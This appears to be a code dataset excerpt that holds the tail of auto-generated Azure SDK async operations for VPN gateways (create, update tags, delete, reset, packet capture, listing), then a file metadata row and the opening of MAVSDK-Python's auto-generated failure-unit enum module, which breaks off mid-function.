cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
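    # Hedged usage sketch for the long-running-operation pattern above
    # (identifiers are placeholders):
    #
    #   poller = await client.vpn_gateways.begin_create_or_update(
    #       "my-rg", "my-gateway", vpn_gateway_parameters)
    #   gateway = await poller.result()   # waits for ARM polling to complete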
async def _update_tags_initial(
self,
resource_group_name: str,
gateway_name: str,
vpn_gateway_parameters: "_models.TagsObject",
**kwargs
) -> Optional["_models.VpnGateway"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.VpnGateway"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(vpn_gateway_parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def begin_update_tags(
self,
resource_group_name: str,
gateway_name: str,
vpn_gateway_parameters: "_models.TagsObject",
**kwargs
) -> AsyncLROPoller["_models.VpnGateway"]:
"""Updates virtual wan vpn gateway tags.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param vpn_gateway_parameters: Parameters supplied to update a virtual wan vpn gateway tags.
:type vpn_gateway_parameters: ~azure.mgmt.network.v2020_06_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VpnGateway or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_06_01.models.VpnGateway]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_tags_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
vpn_gateway_parameters=vpn_gateway_parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
gateway_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
gateway_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes a virtual wan vpn gateway.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}'} # type: ignore
async def _reset_initial(
self,
resource_group_name: str,
gateway_name: str,
**kwargs
) -> Optional["_models.VpnGateway"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.VpnGateway"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
# Construct URL
url = self._reset_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reset_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/reset'} # type: ignore
async def begin_reset(
self,
resource_group_name: str,
gateway_name: str,
**kwargs
) -> AsyncLROPoller["_models.VpnGateway"]:
"""Resets the primary of the vpn gateway in the specified resource group.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either VpnGateway or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_06_01.models.VpnGateway]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VpnGateway"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reset_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VpnGateway', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reset.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/reset'} # type: ignore
async def _start_packet_capture_initial(
self,
resource_group_name: str,
gateway_name: str,
parameters: Optional["_models.VpnGatewayPacketCaptureStartParameters"] = None,
**kwargs
) -> Optional[str]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional[str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._start_packet_capture_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if parameters is not None:
body_content = self._serialize.body(parameters, 'VpnGatewayPacketCaptureStartParameters')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('str', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_start_packet_capture_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/startpacketcapture'} # type: ignore
async def begin_start_packet_capture(
self,
resource_group_name: str,
gateway_name: str,
parameters: Optional["_models.VpnGatewayPacketCaptureStartParameters"] = None,
**kwargs
) -> AsyncLROPoller[str]:
"""Starts packet capture on vpn gateway in the specified resource group.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param parameters: Vpn gateway packet capture parameters supplied to start packet capture on
vpn gateway.
:type parameters: ~azure.mgmt.network.v2020_06_01.models.VpnGatewayPacketCaptureStartParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either str or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[str]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[str]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._start_packet_capture_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('str', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_start_packet_capture.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/startpacketcapture'} # type: ignore
async def _stop_packet_capture_initial(
self,
resource_group_name: str,
gateway_name: str,
parameters: Optional["_models.VpnGatewayPacketCaptureStopParameters"] = None,
**kwargs
) -> Optional[str]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional[str]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._stop_packet_capture_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if parameters is not None:
body_content = self._serialize.body(parameters, 'VpnGatewayPacketCaptureStopParameters')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('str', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_stop_packet_capture_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/stoppacketcapture'} # type: ignore
async def begin_stop_packet_capture(
self,
resource_group_name: str,
gateway_name: str,
parameters: Optional["_models.VpnGatewayPacketCaptureStopParameters"] = None,
**kwargs
) -> AsyncLROPoller[str]:
"""Stops packet capture on vpn gateway in the specified resource group.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:param gateway_name: The name of the gateway.
:type gateway_name: str
:param parameters: Vpn gateway packet capture parameters supplied to stop packet capture on vpn
gateway.
:type parameters: ~azure.mgmt.network.v2020_06_01.models.VpnGatewayPacketCaptureStopParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either str or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[str]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[str]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._stop_packet_capture_initial(
resource_group_name=resource_group_name,
gateway_name=gateway_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('str', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'gatewayName': self._serialize.url("gateway_name", gateway_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_stop_packet_capture.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways/{gatewayName}/stoppacketcapture'} # type: ignore
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.ListVpnGatewaysResult"]:
"""Lists all the VpnGateways in a resource group.
:param resource_group_name: The resource group name of the VpnGateway.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_06_01.models.ListVpnGatewaysResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVpnGatewaysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/vpnGateways'} # type: ignore
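    # Hedged usage sketch for the async paging pattern above (placeholder
    # resource group name):
    #
    #   async for gateway in client.vpn_gateways.list_by_resource_group("my-rg"):
    #       print(gateway.name)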
def list(
self,
**kwargs
) -> AsyncIterable["_models.ListVpnGatewaysResult"]:
"""Lists all the VpnGateways in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ListVpnGatewaysResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_06_01.models.ListVpnGatewaysResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVpnGatewaysResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('ListVpnGatewaysResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/vpnGateways'} # type: ignore
| 49.656442 | 211 | 0.667696 |
42f9888bcd5645c4807993e12f0adea6a1992b56
| 14,047 |
py
|
Python
|
mavsdk/failure.py
|
NicolasM0/MAVSDK-Python
|
41633177a040dd535ad4adf38764a81c10d50760
|
[
"BSD-3-Clause"
] | 1 |
2020-07-11T10:02:28.000Z
|
2020-07-11T10:02:28.000Z
|
mavsdk/failure.py
|
NicolasM0/MAVSDK-Python
|
41633177a040dd535ad4adf38764a81c10d50760
|
[
"BSD-3-Clause"
] | null | null | null |
mavsdk/failure.py
|
NicolasM0/MAVSDK-Python
|
41633177a040dd535ad4adf38764a81c10d50760
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# DO NOT EDIT! This file is auto-generated from
# https://github.com/mavlink/MAVSDK-Python/tree/master/other/templates/py
from ._base import AsyncBase
from . import failure_pb2, failure_pb2_grpc
from enum import Enum
class FailureUnit(Enum):
"""
A failure unit.
Values
------
SENSOR_GYRO
Gyro
SENSOR_ACCEL
Accelerometer
SENSOR_MAG
Magnetometer
SENSOR_BARO
Barometer
SENSOR_GPS
GPS
SENSOR_OPTICAL_FLOW
Optical flow
SENSOR_VIO
Visual inertial odometry
SENSOR_DISTANCE_SENSOR
Distance sensor
SENSOR_AIRSPEED
Airspeed
SYSTEM_BATTERY
Battery
SYSTEM_MOTOR
Motor
SYSTEM_SERVO
Servo
SYSTEM_AVOIDANCE
Avoidance
SYSTEM_RC_SIGNAL
RC signal
SYSTEM_MAVLINK_SIGNAL
MAVLink signal
"""
SENSOR_GYRO = 0
SENSOR_ACCEL = 1
SENSOR_MAG = 2
SENSOR_BARO = 3
SENSOR_GPS = 4
SENSOR_OPTICAL_FLOW = 5
SENSOR_VIO = 6
SENSOR_DISTANCE_SENSOR = 7
SENSOR_AIRSPEED = 8
SYSTEM_BATTERY = 9
SYSTEM_MOTOR = 10
SYSTEM_SERVO = 11
SYSTEM_AVOIDANCE = 12
SYSTEM_RC_SIGNAL = 13
SYSTEM_MAVLINK_SIGNAL = 14
def translate_to_rpc(self):
if self == FailureUnit.SENSOR_GYRO:
return failure_pb2.FAILURE_UNIT_SENSOR_GYRO
if self == FailureUnit.SENSOR_ACCEL:
return failure_pb2.FAILURE_UNIT_SENSOR_ACCEL
if self == FailureUnit.SENSOR_MAG:
return failure_pb2.FAILURE_UNIT_SENSOR_MAG
if self == FailureUnit.SENSOR_BARO:
return failure_pb2.FAILURE_UNIT_SENSOR_BARO
if self == FailureUnit.SENSOR_GPS:
return failure_pb2.FAILURE_UNIT_SENSOR_GPS
if self == FailureUnit.SENSOR_OPTICAL_FLOW:
return failure_pb2.FAILURE_UNIT_SENSOR_OPTICAL_FLOW
if self == FailureUnit.SENSOR_VIO:
return failure_pb2.FAILURE_UNIT_SENSOR_VIO
if self == FailureUnit.SENSOR_DISTANCE_SENSOR:
return failure_pb2.FAILURE_UNIT_SENSOR_DISTANCE_SENSOR
if self == FailureUnit.SENSOR_AIRSPEED:
return failure_pb2.FAILURE_UNIT_SENSOR_AIRSPEED
if self == FailureUnit.SYSTEM_BATTERY:
